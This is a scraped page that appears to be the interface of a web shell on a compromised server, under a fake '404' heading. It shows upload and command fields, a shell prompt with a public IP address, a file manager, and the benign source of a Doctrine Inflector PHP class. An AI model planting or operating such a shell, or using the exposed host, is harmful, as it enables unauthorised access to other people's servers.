404

[ Avaa Bypassed ]




Upload:

Command:

elspacio@3.145.59.167: ~ $
<?php

declare(strict_types=1);

namespace Doctrine\Inflector;

final class Language
{
    public const ENGLISH          = 'english';
    public const FRENCH           = 'french';
    public const NORWEGIAN_BOKMAL = 'norwegian-bokmal';
    public const PORTUGUESE       = 'portuguese';
    public const SPANISH          = 'spanish';
    public const TURKISH          = 'turkish';

    private function __construct()
    {
    }
}

Filemanager

Name Type Size Permission Actions
Rules Folder 0755
CachedWordInflector.php File 535 B 0644
GenericLanguageInflectorFactory.php File 1.7 KB 0644
Inflector.php File 13.04 KB 0644
InflectorFactory.php File 1.44 KB 0644
Language.php File 449 B 0644
LanguageInflectorFactory.php File 838 B 0644
NoopWordInflector.php File 214 B 0644
RulesetInflector.php File 1.38 KB 0644
WordInflector.php File 153 B 0644